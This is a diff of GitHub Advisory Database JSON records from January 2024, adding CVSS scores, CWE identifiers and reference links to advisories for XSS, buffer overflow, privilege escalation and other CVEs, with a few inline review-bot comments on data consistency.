+ "details": "A vulnerability classified as problematic has been found in SourceCodester Employee Management System 1.0. This affects an unknown part of the file edit-profile.php. The manipulation of the argument fullname/phone/date of birth/address/date of appointment leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252279.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1010"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jomskiller/Employee-Management-System---Stored-XSS"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jomskiller/Employee-Management-System---Stored-XSS/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252279"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252279"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T17:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-c87c-56pw-mwgh/GHSA-c87c-56pw-mwgh.json b/advisories/unreviewed/2024/01/GHSA-c87c-56pw-mwgh/GHSA-c87c-56pw-mwgh.json
index 191c7ea5d0347..51a43faa8c631 100644
--- a/advisories/unreviewed/2024/01/GHSA-c87c-56pw-mwgh/GHSA-c87c-56pw-mwgh.json
+++ b/advisories/unreviewed/2024/01/GHSA-c87c-56pw-mwgh/GHSA-c87c-56pw-mwgh.json
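Review bot: The two `WEB` references `https://github.com/jomskiller/Employee-Management-System---Stored-XSS` and the same URL with a trailing slash resolve to the same resource, so the new file carries a duplicate entry that every consumer will render twice; keeping a single one is enough. As with the other new advisory files in this chunk, the file ends with `\ No newline at end of file`, which is worth fixing in the exporter so the JSON files follow the usual trailing-newline convention for version-controlled text.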
@@ -36,6 +36,10 @@
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2024/01/GHSA-c978-j9mm-m34q/GHSA-c978-j9mm-m34q.json b/advisories/unreviewed/2024/01/GHSA-c978-j9mm-m34q/GHSA-c978-j9mm-m34q.json
index 46f83a136071d..ea7437bc85ffe 100644
--- a/advisories/unreviewed/2024/01/GHSA-c978-j9mm-m34q/GHSA-c978-j9mm-m34q.json
+++ b/advisories/unreviewed/2024/01/GHSA-c978-j9mm-m34q/GHSA-c978-j9mm-m34q.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c978-j9mm-m34q",
- "modified": "2024-01-16T21:31:21Z",
+ "modified": "2024-01-30T15:30:20Z",
 "published": "2024-01-16T21:31:21Z",
 "aliases": [
 "CVE-2023-49351"
 ],
 "details": "A stack-based buffer overflow vulnerability in /bin/webs binary in Edimax BR6478AC V2 firmware veraion v1.23 allows attackers to overwrite other values located on the stack due to an incorrect use of the strcpy() function.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -25,9 +28,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-787"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-16T19:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-cc2p-6hmp-4729/GHSA-cc2p-6hmp-4729.json b/advisories/unreviewed/2024/01/GHSA-cc2p-6hmp-4729/GHSA-cc2p-6hmp-4729.json
index 787c78514c0f6..49e4a5ad0a57b 100644
--- a/advisories/unreviewed/2024/01/GHSA-cc2p-6hmp-4729/GHSA-cc2p-6hmp-4729.json
+++ b/advisories/unreviewed/2024/01/GHSA-cc2p-6hmp-4729/GHSA-cc2p-6hmp-4729.json
@@ -28,7 +28,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-120"
 ],
 "severity": "CRITICAL",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-ccwc-jrj7-h4v6/GHSA-ccwc-jrj7-h4v6.json b/advisories/unreviewed/2024/01/GHSA-ccwc-jrj7-h4v6/GHSA-ccwc-jrj7-h4v6.json
index 6586d9988b196..0a77eff253618 100644
--- a/advisories/unreviewed/2024/01/GHSA-ccwc-jrj7-h4v6/GHSA-ccwc-jrj7-h4v6.json
+++ b/advisories/unreviewed/2024/01/GHSA-ccwc-jrj7-h4v6/GHSA-ccwc-jrj7-h4v6.json
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20932"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20240201-0002/"
+ },
 {
 "type": "WEB",
 "url": "https://www.oracle.com/security-alerts/cpujan2024.html"
diff --git a/advisories/unreviewed/2024/01/GHSA-ccxg-74mw-mcc5/GHSA-ccxg-74mw-mcc5.json b/advisories/unreviewed/2024/01/GHSA-ccxg-74mw-mcc5/GHSA-ccxg-74mw-mcc5.json
index 0a29e9e6ef789..4f4f8a5fad16d 100644
--- a/advisories/unreviewed/2024/01/GHSA-ccxg-74mw-mcc5/GHSA-ccxg-74mw-mcc5.json
+++ b/advisories/unreviewed/2024/01/GHSA-ccxg-74mw-mcc5/GHSA-ccxg-74mw-mcc5.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-ccxg-74mw-mcc5",
- "modified": "2024-01-25T09:30:21Z",
+ "modified": "2024-01-31T21:31:03Z",
 "published": "2024-01-25T09:30:21Z",
 "aliases": [
 "CVE-2023-33757"
 ],
 "details": "A lack of SSL certificate validation in Splicecom iPCS (iOS App) v1.3.4, iPCS2 (iOS App) v2.8 and before, and iPCS (Android App) v1.8.5 and before allows attackers to eavesdrop on communications via a man-in-the-middle attack.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
 
@@ -25,9 +28,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-295"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-25T08:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-cmmq-7g27-wvv8/GHSA-cmmq-7g27-wvv8.json b/advisories/unreviewed/2024/01/GHSA-cmmq-7g27-wvv8/GHSA-cmmq-7g27-wvv8.json
index 01603e9ef6993..9d5f0ef56129e 100644
--- a/advisories/unreviewed/2024/01/GHSA-cmmq-7g27-wvv8/GHSA-cmmq-7g27-wvv8.json
+++ b/advisories/unreviewed/2024/01/GHSA-cmmq-7g27-wvv8/GHSA-cmmq-7g27-wvv8.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-cmmq-7g27-wvv8",
- "modified": "2024-01-27T06:30:23Z",
+ "modified": "2024-02-01T06:31:04Z",
 "published": "2024-01-27T06:30:23Z",
 "aliases": [
 "CVE-2024-0697"
@@ -32,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-22"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-cmqr-cw5f-xffm/GHSA-cmqr-cw5f-xffm.json b/advisories/unreviewed/2024/01/GHSA-cmqr-cw5f-xffm/GHSA-cmqr-cw5f-xffm.json
index 0a03a4cdf6bd2..4805f28af6826 100644
--- a/advisories/unreviewed/2024/01/GHSA-cmqr-cw5f-xffm/GHSA-cmqr-cw5f-xffm.json
+++ b/advisories/unreviewed/2024/01/GHSA-cmqr-cw5f-xffm/GHSA-cmqr-cw5f-xffm.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-cmqr-cw5f-xffm",
- "modified": "2024-01-23T21:30:21Z",
+ "modified": "2024-01-29T21:30:27Z",
 "published": "2024-01-23T21:30:21Z",
 "aliases": [
 "CVE-2023-52091"
 ],
 "details": "An anti-spyware engine link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-59"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-crc6-rq97-7rcx/GHSA-crc6-rq97-7rcx.json b/advisories/unreviewed/2024/01/GHSA-crc6-rq97-7rcx/GHSA-crc6-rq97-7rcx.json
new file mode 100644
index 0000000000000..dc6060fc22d0a
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-crc6-rq97-7rcx/GHSA-crc6-rq97-7rcx.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-crc6-rq97-7rcx",
+ "modified": "2024-01-31T18:31:26Z",
+ "published": "2024-01-31T18:31:26Z",
+ "aliases": [
+ "CVE-2024-22162"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM Shortcodes allows Reflected XSS.This issue affects WPZOOM Shortcodes: from n/a through 1.0.1.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22162"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/wpzoom-shortcodes/wordpress-wpzoom-shortcodes-plugin-1-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T18:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-crgw-m82j-jv5c/GHSA-crgw-m82j-jv5c.json b/advisories/unreviewed/2024/01/GHSA-crgw-m82j-jv5c/GHSA-crgw-m82j-jv5c.json
new file mode 100644
index 0000000000000..1dbc98c93dd36
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-crgw-m82j-jv5c/GHSA-crgw-m82j-jv5c.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-crgw-m82j-jv5c",
+ "modified": "2024-01-29T21:30:27Z",
+ "published": "2024-01-29T21:30:27Z",
+ "aliases": [
+ "CVE-2023-4550"
+ ],
+ "details": "Improper Input Validation, Files or Directories Accessible to External Parties vulnerability in OpenText AppBuilder on Windows, Linux allows Probe System Files.\n\nAn unauthenticated or authenticated user can abuse a page of AppBuilder to read arbitrary files on the server on which it is hosted. \n\n\nThis issue affects AppBuilder: from 21.2 before 23.2.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4550"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.opentext.com/csm?id=ot_kb_search&kb_category=61648712db61781068cfd6c4e296197b"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20",
+ "CWE-552"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-crvx-w25m-8x7c/GHSA-crvx-w25m-8x7c.json b/advisories/unreviewed/2024/01/GHSA-crvx-w25m-8x7c/GHSA-crvx-w25m-8x7c.json
index b2bdaca57ee92..6e9ed1ff9f251 100644
--- a/advisories/unreviewed/2024/01/GHSA-crvx-w25m-8x7c/GHSA-crvx-w25m-8x7c.json
+++ b/advisories/unreviewed/2024/01/GHSA-crvx-w25m-8x7c/GHSA-crvx-w25m-8x7c.json
@@ -28,7 +28,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-20"
+ "CWE-20",
+ "CWE-798"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json b/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json
index ecfa2344c9d0e..935609a033104 100644
--- a/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json
+++ b/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json
@@ -32,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-cw47-8xqr-cfh2/GHSA-cw47-8xqr-cfh2.json b/advisories/unreviewed/2024/01/GHSA-cw47-8xqr-cfh2/GHSA-cw47-8xqr-cfh2.json
index 8ee38e8849508..f3d9db162916e 100644
--- a/advisories/unreviewed/2024/01/GHSA-cw47-8xqr-cfh2/GHSA-cw47-8xqr-cfh2.json
+++ b/advisories/unreviewed/2024/01/GHSA-cw47-8xqr-cfh2/GHSA-cw47-8xqr-cfh2.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-cw47-8xqr-cfh2",
- "modified": "2024-01-12T03:30:49Z",
+ "modified": "2024-02-08T18:30:38Z",
 "published": "2024-01-12T03:30:49Z",
 "aliases": [
 "CVE-2023-6040"
@@ -29,6 +29,10 @@
 "type": "WEB",
 "url": "https://www.openwall.com/lists/oss-security/2024/01/12/1"
 },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
+ },
 {
 "type": "WEB",
 "url": "http://www.openwall.com/lists/oss-security/2024/01/12/1"
diff --git a/advisories/unreviewed/2024/01/GHSA-cx8g-4cf5-cjv3/GHSA-cx8g-4cf5-cjv3.json b/advisories/unreviewed/2024/01/GHSA-cx8g-4cf5-cjv3/GHSA-cx8g-4cf5-cjv3.json
index a6623619666f4..867f664a6e439 100644
--- a/advisories/unreviewed/2024/01/GHSA-cx8g-4cf5-cjv3/GHSA-cx8g-4cf5-cjv3.json
+++ b/advisories/unreviewed/2024/01/GHSA-cx8g-4cf5-cjv3/GHSA-cx8g-4cf5-cjv3.json
@@ -40,7 +40,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-122"
+ "CWE-122",
+ "CWE-787"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-f282-55f7-242h/GHSA-f282-55f7-242h.json b/advisories/unreviewed/2024/01/GHSA-f282-55f7-242h/GHSA-f282-55f7-242h.json
index e5b76a47321fa..fef61beb887e5 100644
--- a/advisories/unreviewed/2024/01/GHSA-f282-55f7-242h/GHSA-f282-55f7-242h.json
+++ b/advisories/unreviewed/2024/01/GHSA-f282-55f7-242h/GHSA-f282-55f7-242h.json
@@ -28,7 +28,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-20"
+ "CWE-20",
+ "CWE-798"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-f3p3-3pq5-xp8x/GHSA-f3p3-3pq5-xp8x.json b/advisories/unreviewed/2024/01/GHSA-f3p3-3pq5-xp8x/GHSA-f3p3-3pq5-xp8x.json
new file mode 100644
index 0000000000000..16c6ad32a1784
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-f3p3-3pq5-xp8x/GHSA-f3p3-3pq5-xp8x.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f3p3-3pq5-xp8x",
+ "modified": "2024-02-05T18:31:36Z",
+ "published": "2024-01-29T21:30:27Z",
+ "aliases": [
+ "CVE-2024-24135"
+ ],
+ "details": "Product Name and Product Code in the 'Add Product' section of Sourcecodester Product Inventory with Export to Excel 1.0 are vulnerable to XSS attacks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24135"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/BurakSevben/2024_Product_Inventory_with_Export_to_Excel_XSS/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T19:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-f44w-wxhf-f354/GHSA-f44w-wxhf-f354.json b/advisories/unreviewed/2024/01/GHSA-f44w-wxhf-f354/GHSA-f44w-wxhf-f354.json
new file mode 100644
index 0000000000000..3bedcd2b3fc02
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-f44w-wxhf-f354/GHSA-f44w-wxhf-f354.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f44w-wxhf-f354",
+ "modified": "2024-02-03T00:31:33Z",
+ "published": "2024-01-29T15:30:30Z",
+ "aliases": [
+ "CVE-2023-7199"
+ ],
+ "details": "The Relevanssi WordPress plugin before 4.22.0, Relevanssi Premium WordPress plugin before 2.25.0 allows any unauthenticated user to read draft and private posts via a crafted request",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7199"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wpscan.com/vulnerability/0c96a128-4473-41f5-82ce-94bba33ca4a3/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.relevanssi.com/release-notes/premium-2-25-free-4-22-release-notes/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json b/advisories/unreviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json
deleted file mode 100644
index caaf8e9764af0..0000000000000
--- a/advisories/unreviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-f4qf-m5gf-8jm8",
- "modified": "2024-01-26T15:30:26Z",
- "published": "2024-01-19T12:30:18Z",
- "aliases": [
- "CVE-2024-21733"
- ],
- "details": "Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.\n\nUsers are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.\n\n",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21733"
- },
- {
- "type": "WEB",
- "url": "https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2024/01/19/2"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-209"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2024-01-19T11:15:08Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-f63q-6c68-mrcx/GHSA-f63q-6c68-mrcx.json b/advisories/unreviewed/2024/01/GHSA-f63q-6c68-mrcx/GHSA-f63q-6c68-mrcx.json
index f417a5fe7e62b..30f34b834126a 100644
--- a/advisories/unreviewed/2024/01/GHSA-f63q-6c68-mrcx/GHSA-f63q-6c68-mrcx.json
+++ b/advisories/unreviewed/2024/01/GHSA-f63q-6c68-mrcx/GHSA-f63q-6c68-mrcx.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-f63q-6c68-mrcx",
- "modified": "2024-01-16T18:31:11Z",
+ "modified": "2024-01-30T15:30:20Z",
 "published": "2024-01-16T18:31:11Z",
 "aliases": [
 "CVE-2024-23347"
 ],
 "details": "Prior to v176, when opening a new project Meta Spark Studio would execute scripts defined inside of a package.json file included as part of that project. Those scripts would have the ability to execute arbitrary code on the system as the application.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -27,7 +30,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-16T18:15:11Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-f7x7-cw3q-5rm9/GHSA-f7x7-cw3q-5rm9.json b/advisories/unreviewed/2024/01/GHSA-f7x7-cw3q-5rm9/GHSA-f7x7-cw3q-5rm9.json
index 3f0e53217f572..c0c4aafb6a528 100644
--- a/advisories/unreviewed/2024/01/GHSA-f7x7-cw3q-5rm9/GHSA-f7x7-cw3q-5rm9.json
+++ b/advisories/unreviewed/2024/01/GHSA-f7x7-cw3q-5rm9/GHSA-f7x7-cw3q-5rm9.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-f7x7-cw3q-5rm9",
- "modified": "2024-01-24T00:30:32Z",
+ "modified": "2024-01-29T15:30:24Z",
 "published": "2024-01-24T00:30:32Z",
 "aliases": [
 "CVE-2024-0806"
 ],
 "details": "Use after free in Passwords in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium)",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -37,9 +40,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-24T00:15:07Z"
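Review bot: In the second hunk of GHSA-f63q-6c68-mrcx the commit raises `severity` to `"HIGH"` but leaves `cwe_ids` as an empty array, so the record now carries a high rating with no weakness classification, unlike the sibling updates on this line (GHSA-f7x7-cw3q-5rm9 gets `"CWE-416"` in the same step). The `details` text already pins the mechanism — scripts from a project's package.json executed as the application — so the upstream CWE for this CVE should be carried over, or the `"severity"` bump deferred until the CWE is available, to keep the two fields consistent for consumers that filter on either. The `"cwe_ids": [` context line at the top of that hunk is where the entry belongs.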
diff --git a/advisories/unreviewed/2024/01/GHSA-f8vm-23j7-pf2r/GHSA-f8vm-23j7-pf2r.json b/advisories/unreviewed/2024/01/GHSA-f8vm-23j7-pf2r/GHSA-f8vm-23j7-pf2r.json
index a05bb1c2d9096..df54c24a5294d 100644
--- a/advisories/unreviewed/2024/01/GHSA-f8vm-23j7-pf2r/GHSA-f8vm-23j7-pf2r.json
+++ b/advisories/unreviewed/2024/01/GHSA-f8vm-23j7-pf2r/GHSA-f8vm-23j7-pf2r.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-f8vm-23j7-pf2r",
- "modified": "2024-01-23T03:31:08Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T03:31:08Z",
 "aliases": [
 "CVE-2024-23218"
 ],
 "details": "A timing side-channel issue was addressed with improvements to constant-time computation in cryptographic functions. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An attacker may be able to decrypt legacy RSA PKCS#1 v1.5 ciphertexts without having the private key.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
 
@@ -53,9 +56,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-203"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T01:15:11Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-f8xf-39w2-mrc6/GHSA-f8xf-39w2-mrc6.json b/advisories/unreviewed/2024/01/GHSA-f8xf-39w2-mrc6/GHSA-f8xf-39w2-mrc6.json
index a556d45e77e97..023d78dea7b65 100644
--- a/advisories/unreviewed/2024/01/GHSA-f8xf-39w2-mrc6/GHSA-f8xf-39w2-mrc6.json
+++ b/advisories/unreviewed/2024/01/GHSA-f8xf-39w2-mrc6/GHSA-f8xf-39w2-mrc6.json
@@ -32,6 +32,10 @@
 {
 "type": "WEB",
 "url": "http://packetstormsecurity.com/files/176683/GoAnywhere-MFT-Authentication-Bypass.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176974/Fortra-GoAnywhere-MFT-Unauthenticated-Remote-Code-Execution.html"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2024/01/GHSA-f96h-7c9x-735r/GHSA-f96h-7c9x-735r.json b/advisories/unreviewed/2024/01/GHSA-f96h-7c9x-735r/GHSA-f96h-7c9x-735r.json
index f8769f45489cc..f0a1c08f7cc88 100644
--- a/advisories/unreviewed/2024/01/GHSA-f96h-7c9x-735r/GHSA-f96h-7c9x-735r.json
+++ b/advisories/unreviewed/2024/01/GHSA-f96h-7c9x-735r/GHSA-f96h-7c9x-735r.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-f96h-7c9x-735r",
- "modified": "2024-01-23T21:30:20Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T21:30:20Z",
 "aliases": [
 "CVE-2023-47193"
 ],
 "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47194.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-346"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-f9w7-q39f-hcvh/GHSA-f9w7-q39f-hcvh.json b/advisories/unreviewed/2024/01/GHSA-f9w7-q39f-hcvh/GHSA-f9w7-q39f-hcvh.json
new file mode 100644
index 0000000000000..4618311c7fbb4
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-f9w7-q39f-hcvh/GHSA-f9w7-q39f-hcvh.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f9w7-q39f-hcvh",
+ "modified": "2024-01-29T21:30:27Z",
+ "published": "2024-01-29T21:30:27Z",
+ "aliases": [
+ "CVE-2024-1017"
+ ],
+ "details": "A vulnerability was found in Gabriels FTP Server 1.2. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument USERNAME leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-252287.",
+ "severity": [
+ {
